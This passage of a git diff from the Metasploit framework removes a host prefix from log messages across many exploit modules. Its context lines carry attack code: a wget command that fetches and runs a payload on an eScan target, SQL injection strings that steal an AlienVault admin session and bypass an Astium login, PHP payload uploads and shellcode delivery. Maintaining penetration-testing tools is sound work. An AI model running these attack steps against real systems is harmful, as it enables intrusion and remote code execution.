++--- .../multi/http/sysaid_rdslogs_file_upload.rb | 12 ++--- .../multi/http/testlink_upload_exec.rb | 50 +++++++++---------- .../exploits/multi/http/tomcat_mgr_upload.rb | 34 ++++++------- .../multi/http/uptime_file_upload_1.rb | 6 +-- .../multi/http/vbulletin_unserialize.rb | 4 +- .../http/visual_mining_netcharts_upload.rb | 6 +-- .../exploits/multi/http/vtiger_soap_upload.rb | 6 +-- .../multi/http/webpagetest_upload_exec.rb | 8 +-- .../exploits/multi/http/wikka_spam_exec.rb | 6 +-- ...enworks_configuration_management_upload.rb | 8 +-- .../misc/hp_data_protector_exec_integutil.rb | 18 +++---- .../exploits/multi/misc/java_jdwp_debugger.rb | 38 +++++++------- .../exploits/multi/misc/java_jmx_server.rb | 46 ++++++++--------- .../exploits/multi/misc/java_rmi_server.rb | 4 +- .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 2 +- .../unix/http/vmturbo_vmtadmin_exec_noauth.rb | 10 ++-- .../webapp/actualanalyzer_ant_cookie_exec.rb | 38 +++++++------- .../unix/webapp/arkeia_upload_exec.rb | 12 ++--- .../unix/webapp/clipbucket_upload_exec.rb | 10 ++-- .../unix/webapp/datalife_preview_exec.rb | 2 +- .../unix/webapp/egallery_upload_exec.rb | 8 +-- .../unix/webapp/flashchat_upload_exec.rb | 8 +-- .../unix/webapp/freepbx_config_exec.rb | 8 +-- .../unix/webapp/get_simple_cms_upload_exec.rb | 14 +++--- .../exploits/unix/webapp/hastymail_exec.rb | 12 ++--- .../unix/webapp/havalite_upload_exec.rb | 8 +-- .../unix/webapp/horde_unserialize_exec.rb | 4 +- .../webapp/hybridauth_install_php_exec.rb | 28 +++++------ .../invision_pboard_unserialize_exec.rb | 18 +++---- .../unix/webapp/joomla_akeeba_unserialize.rb | 6 +-- .../webapp/joomla_contenthistory_sqli_rce.rb | 22 ++++---- .../unix/webapp/joomla_media_upload_exec.rb | 18 +++---- modules/exploits/unix/webapp/kimai_sqli.rb | 38 +++++++------- .../unix/webapp/libretto_upload_exec.rb | 8 +-- .../webapp/maarch_letterbox_file_upload.rb | 10 ++-- .../unix/webapp/narcissus_backend_exec.rb | 8 +-- .../webapp/open_flash_chart_upload_exec.rb | 12 ++--- .../webapp/openemr_sqli_privesc_upload.rb | 16 +++--- .../unix/webapp/openemr_upload_exec.rb | 12 ++--- .../unix/webapp/opensis_modname_exec.rb | 12 ++--- .../exploits/unix/webapp/php_charts_exec.rb | 8 +-- .../unix/webapp/projectpier_upload_exec.rb | 8 +-- .../unix/webapp/projectsend_upload_exec.rb | 30 +++++------ .../unix/webapp/seportal_sqli_exec.rb | 20 ++++---- .../webapp/simple_e_document_upload_exec.rb | 14 +++--- .../sixapart_movabletype_storable_exec.rb | 16 +++--- .../unix/webapp/skybluecanvas_exec.rb | 4 +- .../unix/webapp/sugarcrm_unserialize_exec.rb | 12 ++--- .../unix/webapp/tikiwiki_unserialize_exec.rb | 18 +++---- .../unix/webapp/tuleap_unserialize_exec.rb | 6 +-- .../unix/webapp/vbulletin_vote_sqli_exec.rb | 46 ++++++++--------- .../webapp/vicidial_manager_send_cmd_exec.rb | 10 ++-- .../unix/webapp/webmin_show_cgi_exec.rb | 24 ++++----- .../exploits/unix/webapp/webtester_exec.rb | 10 ++-- .../unix/webapp/wp_admin_shell_upload.rb | 10 ++-- .../webapp/wp_ajax_load_more_file_upload.rb | 10 ++-- .../webapp/wp_asset_manager_upload_exec.rb | 4 +- .../wp_creativecontactform_file_upload.rb | 4 +- .../unix/webapp/wp_downloadmanager_upload.rb | 6 +-- .../wp_easycart_unrestricted_file_upload.rb | 24 ++++----- .../unix/webapp/wp_foxypress_upload.rb | 8 +-- .../webapp/wp_frontend_editor_file_upload.rb | 6 +-- .../webapp/wp_holding_pattern_file_upload.rb | 6 +-- .../wp_inboundio_marketing_file_upload.rb | 4 +- .../unix/webapp/wp_infusionsoft_upload.rb | 4 +- .../webapp/wp_nmediawebsite_file_upload.rb | 4 +- .../unix/webapp/wp_optimizepress_upload.rb | 8 +-- ..._photo_gallery_unrestricted_file_upload.rb | 18 +++---- .../unix/webapp/wp_pixabay_images_upload.rb | 10 ++-- .../exploits/unix/webapp/wp_platform_exec.rb | 2 +- .../unix/webapp/wp_property_upload_exec.rb | 4 +- .../webapp/wp_reflexgallery_file_upload.rb | 4 +- .../webapp/wp_revslider_upload_execute.rb | 4 +- .../unix/webapp/wp_slideshowgallery_upload.rb | 10 ++-- .../unix/webapp/wp_symposium_shell_upload.rb | 14 +++--- .../unix/webapp/wp_total_cache_exec.rb | 22 ++++---- .../unix/webapp/wp_worktheflow_upload.rb | 4 +- .../webapp/wp_wpshop_ecommerce_file_upload.rb | 4 +- .../unix/webapp/wp_wptouch_file_upload.rb | 20 ++++---- .../webapp/wp_wysija_newsletters_upload.rb | 6 +-- .../exploits/unix/webapp/xoda_file_upload.rb | 8 +-- .../exploits/unix/webapp/zeroshell_exec.rb | 10 ++-- modules/exploits/unix/webapp/zimbra_lfi.rb | 14 +++--- .../webapp/zoneminder_packagecontrol_exec.rb | 14 +++--- .../unix/webapp/zpanel_username_exec.rb | 10 ++-- .../symantec_endpoint_manager_rce.rb | 2 +- .../symantec_workspace_streaming_exec.rb | 6 +-- .../exploits/windows/ftp/freefloatftp_wbem.rb | 18 +++---- .../exploits/windows/ftp/open_ftpd_wbem.rb | 12 ++--- .../windows/ftp/quickshare_traversal_write.rb | 14 +++--- .../windows/ftp/wing_ftp_admin_exec.rb | 4 +- .../http/avaya_ccr_imageupload_exec.rb | 20 ++++---- .../windows/http/cogent_datahub_command.rb | 8 +-- .../exploits/windows/http/cyclope_ess_sqli.rb | 12 ++--- .../http/desktopcentral_file_upload.rb | 10 ++-- .../desktopcentral_statusupdate_upload.rb | 10 ++-- .../http/efs_easychatserver_username.rb | 10 ++-- .../windows/http/efs_fmws_userid_bof.rb | 12 ++--- .../windows/http/ericom_access_now_bof.rb | 2 +- .../http/generic_http_dll_injection.rb | 2 +- .../http/hp_autopass_license_traversal.rb | 8 +-- .../windows/http/hp_imc_bims_upload.rb | 6 +-- .../windows/http/hp_imc_mibfileupload.rb | 6 +-- .../http/hp_loadrunner_copyfiletoserver.rb | 34 ++++++------- .../exploits/windows/http/hp_mpa_job_acct.rb | 10 ++-- .../http/hp_pcm_snac_update_certificates.rb | 6 +-- .../windows/http/hp_pcm_snac_update_domain.rb | 6 +-- .../windows/http/hp_sitescope_dns_tool.rb | 10 ++-- .../http/hp_sitescope_runomagentcommand.rb | 2 +- .../windows/http/jira_collector_traversal.rb | 14 +++--- .../exploits/windows/http/kaseya_uploader.rb | 4 +- .../http/kaseya_uploadimage_file_upload.rb | 6 +-- .../landesk_thinkmanagement_upload_asp.rb | 18 +++---- .../http/lexmark_markvision_gfd_upload.rb | 14 +++--- .../http/manage_engine_opmanager_rce.rb | 14 +++--- .../windows/http/miniweb_upload_wbem.rb | 6 +-- .../exploits/windows/http/novell_mdm_lfi.rb | 14 +++--- .../windows/http/oracle_btm_writetofile.rb | 20 ++++---- .../windows/http/oracle_endeca_exec.rb | 4 +- .../http/oracle_event_processing_upload.rb | 8 +-- .../exploits/windows/http/rejetto_hfs_exec.rb | 2 +- .../windows/http/sap_host_control_cmd_exec.rb | 12 ++--- .../windows/http/sepm_auth_bypass_rce.rb | 8 +-- .../http/sonicwall_scrutinizer_sqli.rb | 8 +-- .../windows/http/trackit_file_upload.rb | 6 +-- .../windows/http/umbraco_upload_aspx.rb | 32 ++++++------ .../http/vmware_vcenter_chargeback_upload.rb | 14 +++--- .../windows/misc/bigant_server_dupf_upload.rb | 12 ++--- .../windows/misc/hp_dataprotector_cmd_exec.rb | 4 +- .../windows/misc/hp_dataprotector_exec_bar.rb | 4 +- .../misc/hp_dataprotector_traversal.rb | 6 +-- .../misc/hp_operations_agent_coda_34.rb | 10 ++-- .../misc/hp_operations_agent_coda_8c.rb | 10 ++-- .../misc/ibm_director_cim_dllinject.rb | 6 +-- .../manageengine_eventlog_analyzer_rce.rb | 18 +++---- .../windows/misc/ms10_104_sharepoint.rb | 14 +++--- .../windows/misc/sap_netweaver_dispatcher.rb | 6 +-- ...dworks_workgroup_pdmwservice_file_write.rb | 16 +++--- modules/exploits/windows/mysql/mysql_mof.rb | 14 +++--- .../exploits/windows/mysql/mysql_start_up.rb | 4 +- .../novell/file_reporter_fsfui_upload.rb | 8 +-- .../scada/ge_proficy_cimplicity_gefebt.rb | 8 +-- modules/exploits/windows/smb/psexec.rb | 2 +- modules/exploits/windows/smb/psexec_psh.rb | 2 +- 236 files changed, 1400 insertions(+), 1400 deletions(-) diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb index 4bd783ad7b..b204008a4a 100644 --- a/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb +++ b/modules/exploits/freebsd/misc/citrix_netscaler_soap_bof.rb @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - print_status("#{peer} - Sending soap request...") + print_status("Sending soap request...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/antivirus/escan_password_exec.rb b/modules/exploits/linux/antivirus/escan_password_exec.rb index d6236e994b..ed93ca2559 100644 --- a/modules/exploits/linux/antivirus/escan_password_exec.rb +++ b/modules/exploits/linux/antivirus/escan_password_exec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote def cmd_exec(session, cmd) case session.type when /meterpreter/ - print_warning("#{peer} - Use a shell payload in order to get root!") + print_warning("Use a shell payload in order to get root!") when /shell/ o = session.shell_command_token(cmd) o.chomp! if o @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote @dropped_elf = rand_text_alpha(rand(5) + 3) command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(command) if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/ register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf)) @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};" command << File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") exec_command(command, 1) end diff --git a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb index 54a1b3bd45..cfc944d929 100644 --- a/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb +++ b/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb @@ -68,19 +68,19 @@ class Metasploit4 < Msf::Exploit::Remote 'uri' => '/cgi-bin/ping.sh' ) if !res - vprint_error("#{peer} - No response from host") + vprint_error("No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ - vprint_status("#{peer} - Found Boa version #{$1}") + vprint_status("Found Boa version #{$1}") else - print_status("#{peer} - Target is not a Boa web server") + print_status("Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping statistics') return Exploit::CheckCode::Detected else - vprint_error("#{peer} - Target does not appear to be an Advantech switch") + vprint_error("Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end @@ -90,7 +90,7 @@ class Metasploit4 < Msf::Exploit::Remote # def exploit cmd = cve_2014_6271(payload.encoded) - vprint_status("#{peer} - Trying to run command '#{cmd}'") + vprint_status("Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb index 42232de7a8..a64e532d2a 100644 --- a/modules/exploits/linux/http/airties_login_cgi_bof.rb +++ b/modules/exploits/linux/http/airties_login_cgi_bof.rb @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 100 diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 343ff95190..0805c4f7c4 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli = "' and (select 1 from(select count(*),concat((select (select concat(0x#{marker.unpack('H*')[0]},Hex(cast(id as char)),0x#{marker.unpack('H*')[0]})) " sqli << "from alienvault.sessions where login='admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '#{sqli_rand}'='#{sqli_rand}" - print_status("#{peer} - Trying to grab admin session through SQLi") + print_status("Trying to grab admin session through SQLi") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'geoloc', 'graph_geoloc.php'), @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/ admin_session = $1 @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*") - print_status("#{peer} - Admin session cookie is [ #{@cookie} ]") + print_status("Admin session cookie is [ #{@cookie} ]") else fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session") end @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Action [ #{action} ]") + print_status("Created Action [ #{action} ]") else fail_with(Failure::Unknown, "#{peer} - Action creation failed!") end @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/ @action_id = $1 - print_status("#{peer} - Action ID is [ #{@action_id} ]") + print_status("Action ID is [ #{@action_id} ]") else fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!") end @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/ policy_ctx = $1 policy_group = $2 - print_status("#{peer} - Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") + print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!") end @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Created Policy [ #{policy} ]") + print_status("Created Policy [ #{policy} ]") else fail_with(Failure::Unknown, "#{peer} - Policy creation failed!") end @@ -237,13 +237,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/ @policy_id = $1 - print_status("#{peer} - Policy ID [ #{@policy_id} ] retrieved!") + print_status("Policy ID [ #{@policy_id} ] retrieved!") else fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!") end # Reload the policies to make our new policy active - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -255,14 +255,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. dont_exist = rand_text_alpha(8+rand(4)) - print_status("#{peer} - Triggering policy and action by requesting a non existing url") + print_status("Triggering policy and action by requesting a non existing url") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, dont_exist), @@ -270,7 +270,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 404 - print_status("#{peer} - Payload delivered") + print_status("Payload delivered") else fail_with(Failure::Unknown, "#{peer} - Payload failed!") end @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup begin # Clean up, retrieve token so that the policy can be removed - print_status("#{peer} - Cleaning up") + print_status("Cleaning up") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "ossim", "session", "token.php"), @@ -291,9 +291,9 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else - print_warning("#{peer} - Unable to retrieve token") + print_warning("Unable to retrieve token") end # Remove our policy @@ -309,9 +309,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policy ID [ #{@policy_id} ] removed") + print_status("Policy ID [ #{@policy_id} ] removed") else - print_warning("#{peer} - Unable to remove Policy ID") + print_warning("Unable to remove Policy ID") end # Remove our action @@ -325,13 +325,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Action ID [ #{@action_id} ] removed") + print_status("Action ID [ #{@action_id} ] removed") else - print_warning("#{peer} - Unable to remove Action ID") + print_warning("Unable to remove Action ID") end # Reload the policies to revert back to the state before exploitation - print_status("#{peer} - Reloading Policies") + print_status("Reloading Policies") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), @@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 - print_status("#{peer} - Policies reloaded!") + print_status("Policies reloaded!") else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end diff --git a/modules/exploits/linux/http/astium_sqli_upload.rb b/modules/exploits/linux/http/astium_sqli_upload.rb index a721d59af2..e08ec2ccf0 100644 --- a/modules/exploits/linux/http/astium_sqli_upload.rb +++ b/modules/exploits/linux/http/astium_sqli_upload.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect Astium") + vprint_status("Trying to detect Astium") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri), @@ -82,16 +82,16 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/ session = $1 - print_good("#{peer} - Session cookie is [ #{session} ]") + print_good("Session cookie is [ #{session} ]") redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET', @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote pass = rand_text_alphanumeric(10) post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login" - print_status("#{peer} - Using SQLi to bypass authentication") + print_status("Using SQLi to bypass authentication") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "/en", "logon.php"), @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"") file = post_data.to_s - print_status("#{peer} - Uploading Payload [ #{payload_name} ]") + print_status("Uploading Payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "en", "database", "import.php"), @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}") - print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]") - print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes") + print_status("Requesting Payload [ #{uri}upload/#{payload_name} ]") + print_status("Waiting as the reloading process may take some time, this may take a couple of minutes") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "upload", "#{payload_name}") @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response...") + print_error("Unexpected response...") end end diff --git a/modules/exploits/linux/http/belkin_login_bof.rb b/modules/exploits/linux/http/belkin_login_bof.rb index 2994ce4a32..7ead5ddb5a 100644 --- a/modules/exploits/linux/http/belkin_login_bof.rb +++ b/modules/exploits/linux/http/belkin_login_bof.rb @@ -78,13 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200 diff --git a/modules/exploits/linux/http/centreon_sqli_exec.rb b/modules/exploits/linux/http/centreon_sqli_exec.rb index 417e2e6d14..3ed353e001 100644 --- a/modules/exploits/linux/http/centreon_sqli_exec.rb +++ b/modules/exploits/linux/http/centreon_sqli_exec.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - The SQLi cannot be exploited. Possibly because there's nothing in the centreon.session table. Perhaps try again later?") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") random_id = rand_text_numeric(5 + rand(8)) random_char = rand_text_alphanumeric(1) session_injection = "#{random_id}' or '#{random_char}'='#{random_char}" diff --git a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb index e345dc28a1..d0fe19aec3 100644 --- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb @@ -74,13 +74,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_dcs931l_upload.rb b/modules/exploits/linux/http/dlink_dcs931l_upload.rb index bca4beed87..1fb8bbaf5e 100644 --- a/modules/exploits/linux/http/dlink_dcs931l_upload.rb +++ b/modules/exploits/linux/http/dlink_dcs931l_upload.rb @@ -72,15 +72,15 @@ class Metasploit4 < Msf::Exploit::Remote )) unless res - vprint_status("#{peer} - The connection timed out.") + vprint_status("The connection timed out.") return Exploit::CheckCode::Unknown end if res.code && res.code == 404 - vprint_status("#{peer} - uploadfile.htm does not exist") + vprint_status("uploadfile.htm does not exist") return Exploit::CheckCode::Safe elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/ - vprint_error("#{peer} - Authentication failed") + vprint_error("Authentication failed") return Exploit::CheckCode::Detected elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/ return Exploit::CheckCode::Vulnerable @@ -101,7 +101,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Payload uploaded successfully") + print_good("Payload uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") end @@ -117,7 +117,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 404 fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - print_good("#{peer} - Stager uploaded successfully") + print_good("Stager uploaded successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager") end @@ -140,7 +140,7 @@ class Metasploit4 < Msf::Exploit::Remote if res.code && res.code == 401 fail_with(Failure::NoAccess, "#{peer} - Authentication failed") elsif res.code && res.code == 200 && res.body - print_good("#{peer} - Payload executed successfully") + print_good("Payload executed successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed") end @@ -169,9 +169,9 @@ rm -f /tmp/tmpchpw EOF res = upload('/sbin/chpasswd.sh', chpasswd) if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ - vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully") + vprint_good("Restored /sbin/chpasswd.sh successfully") else - vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default") + vprint_warning("Could not restore /sbin/chpasswd.sh to default") end end @@ -179,7 +179,7 @@ EOF # Upload a file to a specified path # def upload(path, data) - vprint_status("#{peer} - Writing #{data.length} bytes to #{path}") + vprint_status("Writing #{data.length} bytes to #{path}") boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" post_data = "--#{boundary}\r\n" diff --git a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb index 14d871d2b0..314bc380bd 100644 --- a/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb +++ b/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote shellcode << rand_text(0x1c) # filler shellcode << payload.encoded # shellcode - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb index 66ea232ee9..84e8fbe741 100644 --- a/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb +++ b/modules/exploits/linux/http/dlink_dspw110_cookie_noauth_exec.rb @@ -73,20 +73,20 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") @counter = 1 execute_cmdstager( :flavor => :echo, :linemax => 95 # limited by our upload, larger payloads crash the web server ) - print_status("#{peer} - creating payload and executing it ...") + print_status("creating payload and executing it ...") (1 .. @counter).each do |act_file| # the http server blocks access to our files ... we copy it to a new one diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb index 2fe19360ba..914ba26974 100644 --- a/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_dspw215_info_cgi_bof.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb index e455b14a64..ef34cda681 100644 --- a/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb +++ b/modules/exploits/linux/http/dlink_hedwig_cgi_bof.rb @@ -73,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, :linemax => 200, diff --git a/modules/exploits/linux/http/dlink_hnap_bof.rb b/modules/exploits/linux/http/dlink_hnap_bof.rb index 62f500e8eb..70967ebe23 100644 --- a/modules/exploits/linux/http/dlink_hnap_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_bof.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") @my_target = target check_code = check @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...") end - print_status("#{peer} - Exploiting #{@my_target.name}...") + print_status("Exploiting #{@my_target.name}...") execute_cmdstager( :flavor => :echo, :linemax => 185 diff --git a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb index 0f001df572..0d747ee3b8 100644 --- a/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb @@ -80,13 +80,13 @@ class Metasploit3 